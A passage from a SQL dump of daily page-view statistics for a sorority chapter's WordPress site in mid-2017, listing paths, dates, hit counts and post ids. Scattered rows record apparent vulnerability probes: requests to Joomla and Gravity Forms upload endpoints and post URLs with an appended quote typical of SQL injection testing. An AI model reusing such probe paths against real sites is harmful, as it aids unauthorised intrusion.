istory/','2017-07-16',1,190),('/scholarship/','2017-07-16',1,797),('/login','2017-07-16',1,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-16',1,956),('/sorors/','2017-07-16',1,1093),('/','2017-07-17',52,6),('/cause/marchofdimes-2/','2017-07-17',18,90),('/history/','2017-07-17',2,190),('/members/','2017-07-17',3,553),('/programs/','2017-07-17',1,247),('/scholarship/','2017-07-17',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-17',1,956),('/login','2017-07-17',1,549),('/ts_teams/cherice-daniel-2/','2017-07-17',1,825),('/ts_teams/lillet-williams-2/','2017-07-17',1,824),('/ts_teams/lillet-williams/','2017-07-17',1,823),('/ts_teams/constance-kinder/','2017-07-17',1,822),('/ts_teams/tamara-curtis/','2017-07-17',1,821),('/ts_teams/shanee-satchell/','2017-07-17',1,820),('/ts_teams/kathy-j-barrett/','2017-07-17',1,819),('/ts_teams/christy-lewis/','2017-07-17',1,818),('/ts_teams/dawn-j-kemp/','2017-07-17',1,817),('/ts_teams/crystal-whitaker/','2017-07-17',1,816),('/ts_teams/tracy-irvin/','2017-07-17',1,815),('/ts_teams/tamika-r-daniels/','2017-07-17',1,814),('/ts_teams/nathalia-drew/','2017-07-17',1,1084),('/ts_teams/kalima-alawode/','2017-07-17',1,888),('/ts_teams/kathy-ball/','2017-07-17',1,887),('/ts_teams/linda-brigmon/','2017-07-17',1,886),('/ts_teams/patreece-carter/','2017-07-17',1,885),('/ts_teams/kristin-clark/','2017-07-17',1,883),('/ts_teams/ebony-cogdell/','2017-07-17',1,882),('/ts_teams/w-ruth-conway/','2017-07-17',1,881),('/ts_teams/cassandra-dorsey/','2017-07-17',1,880),('/ts_teams/maya-franklin/','2017-07-17',1,878),('/ts_teams/michele-franklin/','2017-07-17',1,877),('/ts_teams/quiyatta-gardner/','2017-07-17',1,876),('/ts_teams/sandra-hudson/','2017-07-17',1,875),('/ts_teams/angela-jefferson/','2017-07-17',1,874),('/ts_teams/ava-lawson/','2017-07-17',1,872),('/ts_teams/rose-matthews/','2017-07-17',1,870),('/ts_teams/helen-newman/','2017-07-17',1,868),('/ts_teams/linda-price/','2017-07-17',3,867),('/ts_teams/rosee-ragin/','2017-07-17',1,866),('/ts_teams/gloria-sanders/','2017-07-17',1,865),('/ts_teams/jontue-sumler/','2017-07-17',1,862),('/ts_teams/celia-worrell/','2017-07-17',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-07-17',1,828),('/cause/march-of-dimes/','2017-07-17',1,1023),('/cause/scholarship/','2017-07-17',1,59),('/sorors/','2017-07-17',1,1093),('/download/aarc/','2017-07-17',1,991),('/download/constitution-by-laws/','2017-07-17',1,989),('/cause/marchofdimes-2/','2017-07-18',22,90),('/','2017-07-18',50,6),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-07-18',1,657),('/members/','2017-07-18',1,553),('/ts_teams/jontue-sumler/','2017-07-18',1,862),('/cause/marchofdimes-2/','2017-07-19',11,90),('/','2017-07-19',45,6),('/login','2017-07-19',1,549),('/sorors/','2017-07-19',1,1093),('/ts_teams/sandra-hudson/','2017-07-19',1,875),('/membership/','2017-07-19',1,576),('/ts_teams/kristin-clark/','2017-07-19',1,883),('/cause/marchofdimes-2/','2017-07-20',35,90),('/','2017-07-20',50,6),('/members/','2017-07-20',3,553),('/history/','2017-07-20',1,190),('/programs/','2017-07-20',2,247),('/scholarship/','2017-07-20',2,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-20',1,956),('/login','2017-07-20',1,549),('/sorors/','2017-07-20',1,1093),('/cause/march-of-dimes/','2017-07-20',4,1023),('/','2017-07-21',68,6),('/cause/marchofdimes-2/','2017-07-21',12,90),('/cause/march-of-dimes/','2017-07-21',2,1023),('/history/','2017-07-21',1,190),('/scholarship/','2017-07-21',1,797),('/members/','2017-07-21',1,553),('/','2017-07-22',46,6),('/cause/marchofdimes-2/','2017-07-22',27,90),('/scholarship/','2017-07-22',1,797),('/ts_teams/kathy-j-barrett/','2017-07-22',1,819),('/programs/','2017-07-22',2,247),('/history/','2017-07-22',2,190),('/login','2017-07-22',2,549),('/sorors/','2017-07-22',3,1093),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-22',1,956),('/cause/marchofdimes-2/','2017-07-23',11,90),('/','2017-07-23',31,6),('/ts_teams/gloria-sanders/','2017-07-23',1,865),('/members/','2017-07-23',4,553),('/login','2017-07-23',2,549),('/sorors/','2017-07-23',2,1093),('/scholarship/','2017-07-23',3,797),('/cause/scholarship/','2017-07-23',1,59),('/programs/','2017-07-23',1,247),('/history/','2017-07-23',1,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-23',1,956),('/cause/marchofdimes-2/','2017-07-24',38,90),('/','2017-07-24',51,6),('/history/','2017-07-24',4,190),('/members/','2017-07-24',7,553),('/programs/','2017-07-24',6,247),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-24',2,956),('/scholarship/','2017-07-24',1,797),('/login','2017-07-24',1,549),('/sorors/','2017-07-24',1,1093),('/instagram-show-private-person-declines/','2017-07-24',1,1096),('/ts_teams/linda-price/','2017-07-24',1,867),('/ts_teams/lillet-williams-2/','2017-07-24',1,824),('/ts_teams/angela-jefferson/','2017-07-24',1,874),('/ts_teams/rosee-ragin/','2017-07-24',1,866),('/ts_teams/cassandra-dorsey/','2017-07-24',1,880),('/ts_teams/dawn-j-kemp/','2017-07-24',1,817),('/ts_teams/shanee-satchell/','2017-07-24',1,820),('/ts_teams/tamara-curtis/','2017-07-24',1,821),('/ts_teams/tracy-irvin/','2017-07-24',1,815),('/ts_teams/w-ruth-conway/','2017-07-24',1,881),('/ts_teams/michele-franklin/','2017-07-24',1,877),('/cause/scholarship/','2017-07-24',1,59),('/cause/march-of-dimes/','2017-07-24',1,1023),('/download/aarc/','2017-07-24',1,991),('/download/constitution-by-laws/','2017-07-24',1,989),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-07-24',1,689),('/ts_slider/567/','2017-07-24',1,567),('/cause/marchofdimes-2/','2017-07-25',28,90),('/scholarship/','2017-07-25',5,797),('/','2017-07-25',54,6),('/index.php','2017-07-25',2,6),('/scholarship','2017-07-25',1,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-25',2,956),('/ts_teams/kathy-j-barrett/','2017-07-25',1,819),('/ts_teams/ava-lawson/','2017-07-25',2,872),('/','2017-07-26',45,6),('/cause/marchofdimes-2/','2017-07-26',24,90),('/scholarship/','2017-07-26',3,797),('/scholarship','2017-07-26',2,797),('/programs/','2017-07-26',1,247),('/members/','2017-07-26',1,553),('/cause/marchofdimes-2/','2017-07-27',21,90),('/','2017-07-27',52,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-27',2,956),('/login','2017-07-27',3,549),('/history/','2017-07-27',2,190),('/members/','2017-07-27',8,553),('/scholarship/','2017-07-27',2,797),('/programs/','2017-07-27',2,247),('/instagram-show-private-person-declines/','2017-07-27',1,1096),('/sorors/','2017-07-27',2,1093),('/','2017-07-28',54,6),('/cause/marchofdimes-2/','2017-07-28',27,90),('/scholarship/','2017-07-28',2,797),('/login','2017-07-28',1,549),('/sorors/','2017-07-28',1,1093),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-28',1,956),('/members/','2017-07-28',1,553),('/','2017-07-29',27,6),('/cause/marchofdimes-2/','2017-07-29',29,90),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-29',1,956),('/cause/marchofdimes-2/','2017-07-30',25,90),('/index.php?option=com_myblog&task=ajaxupload','2017-07-30',1,6),('/index.php?option=com_adsmanager&task=upload&tmpl=component','2017-07-30',1,6),('/','2017-07-30',43,6),('/login/','2017-07-30',1,549),('/members/','2017-07-30',4,553),('/ts_teams/tracy-irvin/','2017-07-30',2,815),('/programs/','2017-07-30',3,247),('/history/','2017-07-30',3,190),('/scholarship/','2017-07-30',2,797),('/login','2017-07-30',2,549),('/sorors/','2017-07-30',2,1093),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-30',1,956),('/ts_teams/cherice-daniel-2/','2017-07-30',1,825),('/ts_teams/lillet-williams-2/','2017-07-30',1,824),('/ts_teams/lillet-williams/','2017-07-30',1,823),('/ts_teams/constance-kinder/','2017-07-30',1,822),('/ts_teams/tamara-curtis/','2017-07-30',1,821),('/ts_teams/shanee-satchell/','2017-07-30',1,820),('/ts_teams/kathy-j-barrett/','2017-07-30',1,819),('/ts_teams/christy-lewis/','2017-07-30',1,818),('/ts_teams/dawn-j-kemp/','2017-07-30',1,817),('/ts_teams/crystal-whitaker/','2017-07-30',1,816),('/ts_teams/tamika-r-daniels/','2017-07-30',1,814),('/ts_teams/nathalia-drew/','2017-07-30',1,1084),('/ts_teams/kalima-alawode/','2017-07-30',1,888),('/ts_teams/kathy-ball/','2017-07-30',1,887),('/ts_teams/linda-brigmon/','2017-07-30',1,886),('/ts_teams/patreece-carter/','2017-07-30',1,885),('/ts_teams/kristin-clark/','2017-07-30',1,883),('/ts_teams/ebony-cogdell/','2017-07-30',1,882),('/ts_teams/w-ruth-conway/','2017-07-30',1,881),('/ts_teams/cassandra-dorsey/','2017-07-30',1,880),('/ts_teams/maya-franklin/','2017-07-30',1,878),('/ts_teams/michele-franklin/','2017-07-30',1,877),('/ts_teams/quiyatta-gardner/','2017-07-30',1,876),('/ts_teams/sandra-hudson/','2017-07-30',1,875),('/ts_teams/angela-jefferson/','2017-07-30',1,874),('/ts_teams/ava-lawson/','2017-07-30',1,872),('/ts_teams/rose-matthews/','2017-07-30',1,870),('/ts_teams/helen-newman/','2017-07-30',1,868),('/ts_teams/linda-price/','2017-07-30',1,867),('/ts_teams/rosee-ragin/','2017-07-30',1,866),('/ts_teams/gloria-sanders/','2017-07-30',1,865),('/ts_teams/jontue-sumler/','2017-07-30',1,862),('/ts_teams/celia-worrell/','2017-07-30',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-07-30',1,828),('/cause/march-of-dimes/','2017-07-30',1,1023),('/cause/scholarship/','2017-07-30',1,59),('/instagram-show-private-person-declines/','2017-07-30',1,1096),('/download/aarc/','2017-07-30',1,991),('/download/constitution-by-laws/','2017-07-30',1,989),('/','2017-07-31',58,6),('/cause/marchofdimes-2/','2017-07-31',25,90),('/index.php','2017-07-31',1,6),('/scholarship/','2017-07-31',2,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-07-31',2,956),('/download/aarc/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-07-31',2,991),('/members/','2017-07-31',1,553),('/cause/marchofdimes-2/','2017-08-01',26,90),('/','2017-08-01',50,6),('/index.php','2017-08-01',1,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-01',1,956),('/history/','2017-08-01',1,190),('/members/','2017-08-01',3,553),('/programs/','2017-08-01',1,247),('/login/','2017-08-01',1,549),('/sorors/','2017-08-01',1,1093),('/download/constitution-by-laws/','2017-08-01',2,989),('/cause/marchofdimes-2/','2017-08-02',24,90),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-02',3,956),('/','2017-08-02',51,6),('/history/','2017-08-02',2,190),('/members/','2017-08-02',2,553),('/login','2017-08-02',1,549),('/sorors/','2017-08-02',1,1093),('/programs/','2017-08-02',2,247),('/appa','2017-08-02',1,781),('/appa/','2017-08-02',1,781),('/bog','2017-08-02',1,772),('/bog/','2017-08-02',1,772),('/ts_teams/lillet-williams-2/','2017-08-02',1,824),('/','2017-08-03',50,6),('/cause/marchofdimes-2/','2017-08-03',40,90),('/history/','2017-08-03',5,190),('/programs/','2017-08-03',3,247),('/scholarship/','2017-08-03',6,797),('/members/','2017-08-03',4,553),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-03',1,956),('/login','2017-08-03',2,549),('/sorors/','2017-08-03',3,1093),('/scholarship','2017-08-03',2,797),('/cause/marchofdimes-2','2017-08-03',1,90),('/programs','2017-08-03',1,247),('/members','2017-08-03',1,553),('/login/','2017-08-03',1,549),('/cause/marchofdimes-2/','2017-08-04',20,90),('/','2017-08-04',32,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-04',1,956),('/history/','2017-08-04',2,190),('/members/','2017-08-04',3,553),('/programs/','2017-08-04',2,247),('/scholarship/','2017-08-04',2,797),('/login','2017-08-04',2,549),('/sorors/','2017-08-04',2,1093),('/cause/marchofdimes-2','2017-08-04',1,90),('/programs','2017-08-04',1,247),('/scholarship','2017-08-04',1,797),('/members','2017-08-04',1,553),('/cause/marchofdimes-2/','2017-08-05',32,90),('/','2017-08-05',42,6),('/members/','2017-08-05',3,553),('/','2017-08-06',39,6),('/cause/marchofdimes-2/','2017-08-06',31,90),('/history/','2017-08-06',2,190),('/programs/','2017-08-06',1,247),('/scholarship/','2017-08-06',1,797),('/members/','2017-08-06',1,553),('/login','2017-08-06',1,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-06',1,956),('/sorors/','2017-08-06',1,1093),('/cause/marchofdimes-2/','2017-08-07',21,90),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Ftheme-editor.php&reauth=1','2017-08-07',1,657),('/','2017-08-07',41,6),('/programs/','2017-08-07',3,247),('/members/','2017-08-07',4,553),('/history/','2017-08-07',3,190),('/scholarship/','2017-08-07',4,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-07',2,956),('/login','2017-08-07',1,549),('/sorors/','2017-08-07',2,1093),('/ts_teams/cherice-daniel-2/','2017-08-07',2,825),('/ts_teams/lillet-williams-2/','2017-08-07',2,824),('/ts_teams/lillet-williams/','2017-08-07',2,823),('/ts_teams/constance-kinder/','2017-08-07',2,822),('/ts_teams/tamara-curtis/','2017-08-07',2,821),('/ts_teams/shanee-satchell/','2017-08-07',2,820),('/ts_teams/kathy-j-barrett/','2017-08-07',2,819),('/ts_teams/christy-lewis/','2017-08-07',2,818),('/ts_teams/dawn-j-kemp/','2017-08-07',2,817),('/ts_teams/crystal-whitaker/','2017-08-07',2,816),('/ts_teams/tracy-irvin/','2017-08-07',2,815),('/ts_teams/tamika-r-daniels/','2017-08-07',2,814),('/ts_teams/nathalia-drew/','2017-08-07',2,1084),('/ts_teams/kalima-alawode/','2017-08-07',2,888),('/ts_teams/kathy-ball/','2017-08-07',2,887),('/ts_teams/linda-brigmon/','2017-08-07',2,886),('/ts_teams/patreece-carter/','2017-08-07',2,885),('/ts_teams/kristin-clark/','2017-08-07',2,883),('/ts_teams/ebony-cogdell/','2017-08-07',2,882),('/ts_teams/w-ruth-conway/','2017-08-07',2,881),('/ts_teams/cassandra-dorsey/','2017-08-07',2,880),('/ts_teams/maya-franklin/','2017-08-07',2,878),('/ts_teams/michele-franklin/','2017-08-07',2,877),('/ts_teams/quiyatta-gardner/','2017-08-07',2,876),('/ts_teams/sandra-hudson/','2017-08-07',2,875),('/ts_teams/angela-jefferson/','2017-08-07',2,874),('/ts_teams/ava-lawson/','2017-08-07',2,872),('/ts_teams/rose-matthews/','2017-08-07',2,870),('/ts_teams/helen-newman/','2017-08-07',2,868),('/ts_teams/linda-price/','2017-08-07',2,867),('/ts_teams/rosee-ragin/','2017-08-07',2,866),('/ts_teams/gloria-sanders/','2017-08-07',2,865),('/ts_teams/jontue-sumler/','2017-08-07',2,862),('/ts_teams/celia-worrell/','2017-08-07',2,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-08-07',2,828),('/download/constitution-by-laws/','2017-08-07',7,989),('/appa','2017-08-07',1,781),('/appa/','2017-08-07',2,781),('/youth','2017-08-07',1,738),('/youth/','2017-08-07',2,738),('/bog','2017-08-07',1,772),('/bog/','2017-08-07',2,772),('/zen','2017-08-07',1,786),('/zen/','2017-08-07',2,786),('/scholarship','2017-08-07',1,797),('/cause/march-of-dimes/','2017-08-07',2,1023),('/cause/scholarship/','2017-08-07',2,59),('/instagram-show-private-person-declines/','2017-08-07',2,1096),('/?p=956\\\'','2017-08-07',1,956),('/download/aarc/','2017-08-07',3,991),('/?p=1096\\\'','2017-08-07',1,1096),('/login/','2017-08-07',1,549),('/','2017-08-08',42,6),('/cause/marchofdimes-2/','2017-08-08',28,90),('/programs/','2017-08-08',1,247),('/login','2017-08-08',1,549),('/sorors/','2017-08-08',1,1093),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-08',4,956),('/download/aarc/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-08-08',2,991),('/cause/scholarship/','2017-08-08',1,59),('/login/','2017-08-08',2,549),('/zen','2017-08-08',1,786),('/zen/','2017-08-08',1,786),('/history/','2017-08-08',1,190),('/instagram-show-private-person-declines/','2017-08-08',1,1096),('/youth','2017-08-08',1,738),('/youth/','2017-08-08',2,738),('/appa','2017-08-08',1,781),('/appa/','2017-08-08',1,781),('/','2017-08-09',51,6),('/cause/marchofdimes-2/','2017-08-09',24,90),('/user/','2017-08-09',1,547),('/appa/','2017-08-09',1,781),('/scholarship/','2017-08-09',2,797),('/login','2017-08-09',2,549),('/sorors/','2017-08-09',2,1093),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-08-09',1,657),('/login-2/','2017-08-09',1,657),('/history','2017-08-09',1,190),('/history/','2017-08-09',2,190),('/programs/','2017-08-09',1,247),('/members/','2017-08-09',1,553),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-09',1,956),('/?pwidget=3371&action=1','2017-08-10',1,6),('/cause/marchofdimes-2/','2017-08-10',21,90),('/','2017-08-10',49,6),('/scholarship-testing/','2017-08-10',6,1107),('/members/','2017-08-10',1,553),('/scholarship-testing/?gf_token=06f58cd3f8a74b3d9780b49b159add0f','2017-08-10',1,1107),('/','2017-08-11',60,6),('/cause/marchofdimes-2/','2017-08-11',28,90),('/scholarship-testing/','2017-08-11',6,1107),('/scholarship','2017-08-11',1,797),('/scholarship/','2017-08-11',4,797),('/scholarship-testing/?gf_token=06f58cd3f8a74b3d9780b49b159add0f','2017-08-11',1,1107),('/scholarship-testing','2017-08-11',1,1107),('/login/','2017-08-11',1,549),('/sorors/','2017-08-11',1,1093),('/history/','2017-08-11',1,190),('/members/','2017-08-11',1,553),('/programs/','2017-08-11',1,247),('/ts_teams/rose-matthews/','2017-08-11',1,870),('/cause/marchofdimes-2/','2017-08-12',28,90),('/','2017-08-12',34,6),('/scholarship/','2017-08-12',2,797),('/lgz-celebrates-35-years-service-howard-county-md','2017-08-12',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-12',1,956),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Fadmin.php%3Fpage%3Dgf_edit_forms&reauth=1','2017-08-12',1,657),('/','2017-08-13',29,6),('/cause/marchofdimes-2/','2017-08-13',26,90),('/scholarship/','2017-08-13',3,797),('/programs/','2017-08-13',2,247),('/members/','2017-08-13',3,553),('/login','2017-08-13',1,549),('/sorors/','2017-08-13',2,1093),('/history/','2017-08-13',2,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-13',2,956),('/bog','2017-08-13',1,772),('/appa','2017-08-13',1,781),('/youth','2017-08-13',1,738),('/ts_teams/kathy-j-barrett/','2017-08-13',2,819),('/ts_teams/shanee-satchell/','2017-08-13',2,820),('/ts_teams/celia-worrell/','2017-08-13',2,860),('/ts_teams/helen-newman/','2017-08-13',2,868),('/scholarship','2017-08-13',1,797),('/ts_teams/christy-lewis/','2017-08-13',2,818),('/ts_teams/linda-price/','2017-08-13',2,867),('/ts_teams/ava-lawson/','2017-08-13',2,872),('/ts_teams/constance-kinder/','2017-08-13',2,822),('/ts_teams/lillet-williams/','2017-08-13',2,823),('/ts_teams/rose-matthews/','2017-08-13',2,870),('/ts_teams/rosee-ragin/','2017-08-13',2,866),('/ts_teams/tracy-irvin/','2017-08-13',2,815),('/zen','2017-08-13',1,786),('/ts_teams/sandra-hudson/','2017-08-13',2,875),('/ts_teams/jeaneathia-yerby-crowder/','2017-08-13',2,828),('/ts_teams/kathy-ball/','2017-08-13',2,887),('/ts_teams/michele-franklin/','2017-08-13',2,877),('/ts_teams/dawn-j-kemp/','2017-08-13',3,817),('/ts_teams/w-ruth-conway/','2017-08-13',2,881),('/ts_teams/quiyatta-gardner/','2017-08-13',2,876),('/?p=956','2017-08-13',1,956),('/members/feed/','2017-08-13',1,553),('/ts_teams/cherice-daniel-2/','2017-08-13',2,825),('/ts_teams/patreece-carter/','2017-08-13',2,885),('/ts_teams/jontue-sumler/','2017-08-13',2,862),('/ts_teams/maya-franklin/','2017-08-13',2,878),('/ts_teams/nathalia-drew/','2017-08-13',2,1084),('/ts_teams/gloria-sanders/','2017-08-13',3,865),('/ts_teams/crystal-whitaker/','2017-08-13',2,816),('/ts_teams/cassandra-dorsey/','2017-08-13',2,880),('/ts_teams/linda-brigmon/','2017-08-13',2,886),('/ts_teams/angela-jefferson/','2017-08-13',2,874),('/ts_teams/lillet-williams-2/','2017-08-13',2,824),('/ts_teams/tamara-curtis/','2017-08-13',2,821),('/ts_teams/kristin-clark/','2017-08-13',2,883),('/ts_teams/kalima-alawode/','2017-08-13',2,888),('/ts_teams/tamika-r-daniels/','2017-08-13',2,814),('/ts_teams/ebony-cogdell/','2017-08-13',2,882),('/instagram-show-private-person-declines/','2017-08-13',2,1096),('/cause/scholarship/','2017-08-13',2,59),('/ts_slider/567/','2017-08-13',2,567),('/sermon/zeta-phi-beta-sorority-inc-serves-howard-county-for-35-years/','2017-08-13',2,689),('/?p=1096','2017-08-13',1,1096),('/cause/march-of-dimes/','2017-08-13',2,1023),('/','2017-08-14',59,6),('/history/','2017-08-14',3,190),('/members/','2017-08-14',3,553),('/programs/','2017-08-14',3,247),('/scholarship/','2017-08-14',6,797),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-14',3,956),('/login','2017-08-14',3,549),('/ts_teams/cherice-daniel-2/','2017-08-14',1,825),('/ts_teams/lillet-williams-2/','2017-08-14',1,824),('/ts_teams/lillet-williams/','2017-08-14',2,823),('/ts_teams/constance-kinder/','2017-08-14',1,822),('/ts_teams/tamara-curtis/','2017-08-14',1,821),('/ts_teams/shanee-satchell/','2017-08-14',1,820),('/ts_teams/kathy-j-barrett/','2017-08-14',1,819),('/ts_teams/christy-lewis/','2017-08-14',1,818),('/ts_teams/dawn-j-kemp/','2017-08-14',2,817),('/ts_teams/crystal-whitaker/','2017-08-14',1,816),('/ts_teams/tracy-irvin/','2017-08-14',2,815),('/ts_teams/tamika-r-daniels/','2017-08-14',2,814),('/ts_teams/nathalia-drew/','2017-08-14',1,1084),('/ts_teams/kalima-alawode/','2017-08-14',1,888),('/ts_teams/kathy-ball/','2017-08-14',1,887),('/ts_teams/linda-brigmon/','2017-08-14',1,886),('/ts_teams/patreece-carter/','2017-08-14',1,885),('/ts_teams/kristin-clark/','2017-08-14',1,883),('/ts_teams/ebony-cogdell/','2017-08-14',1,882),('/ts_teams/w-ruth-conway/','2017-08-14',1,881),('/ts_teams/cassandra-dorsey/','2017-08-14',1,880),('/ts_teams/maya-franklin/','2017-08-14',1,878),('/ts_teams/michele-franklin/','2017-08-14',1,877),('/ts_teams/quiyatta-gardner/','2017-08-14',2,876),('/ts_teams/sandra-hudson/','2017-08-14',1,875),('/ts_teams/angela-jefferson/','2017-08-14',1,874),('/ts_teams/ava-lawson/','2017-08-14',1,872),('/ts_teams/rose-matthews/','2017-08-14',1,870),('/ts_teams/helen-newman/','2017-08-14',1,868),('/ts_teams/linda-price/','2017-08-14',1,867),('/ts_teams/rosee-ragin/','2017-08-14',1,866),('/ts_teams/gloria-sanders/','2017-08-14',1,865),('/ts_teams/jontue-sumler/','2017-08-14',1,862),('/ts_teams/celia-worrell/','2017-08-14',1,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-08-14',1,828),('/instagram-show-private-person-declines/','2017-08-14',2,1096),('/sorors/','2017-08-14',3,1093),('/download/aarc/','2017-08-14',1,991),('/download/constitution-by-laws/','2017-08-14',3,989),('/cause/marchofdimes-2/','2017-08-14',25,90),('/','2017-08-15',64,6),('/cause/marchofdimes-2/','2017-08-15',20,90),('/download/constitution-by-laws/','2017-08-15',1,989),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dfooter.php&reauth=1','2017-08-15',1,657),('/scholarship/','2017-08-15',2,797),('/members/','2017-08-15',1,553),('/login','2017-08-15',4,549),('/sorors/','2017-08-15',4,1093),('/programs/','2017-08-15',1,247),('/','2017-08-16',75,6),('/cause/marchofdimes-2/','2017-08-16',27,90),('/history/','2017-08-16',2,190),('/members/','2017-08-16',1,553),('/programs/','2017-08-16',1,247),('/members/','2017-08-17',7,553),('/','2017-08-17',62,6),('/scholarship/','2017-08-17',1,797),('/history/','2017-08-17',3,190),('/programs/','2017-08-17',6,247),('/login','2017-08-17',1,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-17',1,956),('/sorors/','2017-08-17',1,1093),('/cause/marchofdimes-2/','2017-08-17',20,90),('/download/constitution-by-laws/','2017-08-17',2,989),('/','2017-08-18',66,6),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-18',1,956),('/login','2017-08-18',2,549),('/history/','2017-08-18',2,190),('/members/','2017-08-18',2,553),('/scholarship/','2017-08-18',2,797),('/programs/','2017-08-18',3,247),('/instagram-show-private-person-declines/','2017-08-18',1,1096),('/sorors/','2017-08-18',1,1093),('/cause/marchofdimes-2/','2017-08-18',22,90),('//?gf_page=upload','2017-08-18',1,6),('/','2017-08-19',28,6),('/cause/marchofdimes-2/','2017-08-19',23,90),('/download/aarc/?=Send&contact-form-email=1&contact-form-name=1&contact-form-text=1','2017-08-19',3,991),('/zen/','2017-08-19',1,786),('/ts_teams/cherice-daniel-2','2017-08-19',1,825),('/ts_teams/cherice-daniel-2/','2017-08-19',1,825),('/lgz-celebrates-35-years-service-howard-county-md','2017-08-19',1,956),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-19',1,956),('/','2017-08-20',42,6),('/cause/marchofdimes-2/','2017-08-20',22,90),('/history/','2017-08-20',1,190),('/programs/','2017-08-20',1,247),('/scholarship/','2017-08-20',1,797),('/members/','2017-08-20',1,553),('/login','2017-08-20',3,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-20',2,956),('/sorors/','2017-08-20',4,1093),('/cause/marchofdimes-2/','2017-08-21',26,90),('/','2017-08-21',50,6),('/members/','2017-08-21',5,553),('/programs/','2017-08-21',2,247),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-21',1,956),('/','2017-08-22',55,6),('/login/','2017-08-22',1,549),('/sorors/','2017-08-22',5,1093),('/cause/marchofdimes-2/','2017-08-22',21,90),('/history/','2017-08-22',1,190),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-22',3,956),('/download/constitution-by-laws/','2017-08-22',2,989),('/','2017-08-23',57,6),('/cause/marchofdimes-2/','2017-08-23',20,90),('/sorors/','2017-08-23',9,1093),('/scholarship/','2017-08-23',7,797),('/history/','2017-08-23',5,190),('/programs/','2017-08-23',7,247),('/members/','2017-08-23',5,553),('/login','2017-08-23',5,549),('/lgz-celebrates-35-years-service-howard-county-md/','2017-08-23',5,956),('/history','2017-08-23',2,190),('/members','2017-08-23',2,553),('/programs','2017-08-23',2,247),('/scholarship','2017-08-23',2,797),('/lgz-celebrates-35-years-service-howard-county-md','2017-08-23',2,956),('/login-2/?redirect_to=http%3A%2F%2Fzphiblgz.org%2Fwp-admin%2F&reauth=1','2017-08-23',4,657),('/index.php','2017-08-23',2,6),('/login/','2017-08-23',4,549),('/index.php?dispatch=auth.login_form','2017-08-23',2,6),('/?dispatch=auth.login_form','2017-08-23',2,6),('/ts_teams/cherice-daniel-2/','2017-08-23',2,825),('/ts_teams/lillet-williams-2/','2017-08-23',2,824),('/ts_teams/lillet-williams/','2017-08-23',2,823),('/ts_teams/constance-kinder/','2017-08-23',2,822),('/ts_teams/tamara-curtis/','2017-08-23',2,821),('/ts_teams/shanee-satchell/','2017-08-23',2,820),('/ts_teams/kathy-j-barrett/','2017-08-23',2,819),('/ts_teams/christy-lewis/','2017-08-23',2,818),('/ts_teams/dawn-j-kemp/','2017-08-23',2,817),('/ts_teams/crystal-whitaker/','2017-08-23',2,816),('/ts_teams/tracy-irvin/','2017-08-23',2,815),('/ts_teams/tamika-r-daniels/','2017-08-23',2,814),('/ts_teams/nathalia-drew/','2017-08-23',2,1084),('/ts_teams/kalima-alawode/','2017-08-23',2,888),('/ts_teams/kathy-ball/','2017-08-23',2,887),('/ts_teams/linda-brigmon/','2017-08-23',2,886),('/ts_teams/patreece-carter/','2017-08-23',2,885),('/ts_teams/kristin-clark/','2017-08-23',2,883),('/ts_teams/ebony-cogdell/','2017-08-23',2,882),('/ts_teams/w-ruth-conway/','2017-08-23',2,881),('/ts_teams/cassandra-dorsey/','2017-08-23',2,880),('/ts_teams/maya-franklin/','2017-08-23',2,878),('/ts_teams/michele-franklin/','2017-08-23',2,877),('/ts_teams/quiyatta-gardner/','2017-08-23',2,876),('/ts_teams/sandra-hudson/','2017-08-23',2,875),('/ts_teams/angela-jefferson/','2017-08-23',2,874),('/ts_teams/ava-lawson/','2017-08-23',2,872),('/ts_teams/rose-matthews/','2017-08-23',2,870),('/ts_teams/helen-newman/','2017-08-23',2,868),('/ts_teams/linda-price/','2017-08-23',2,867),('/ts_teams/rosee-ragin/','2017-08-23',2,866),('/ts_teams/gloria-sanders/','2017-08-23',2,865),('/ts_teams/jontue-sumler/','2017-08-23',2,862),('/ts_teams/celia-worrell/','2017-08-23',2,860),('/ts_teams/jeaneathia-yerby-crowder/','2017-08-23',2,828),('/','20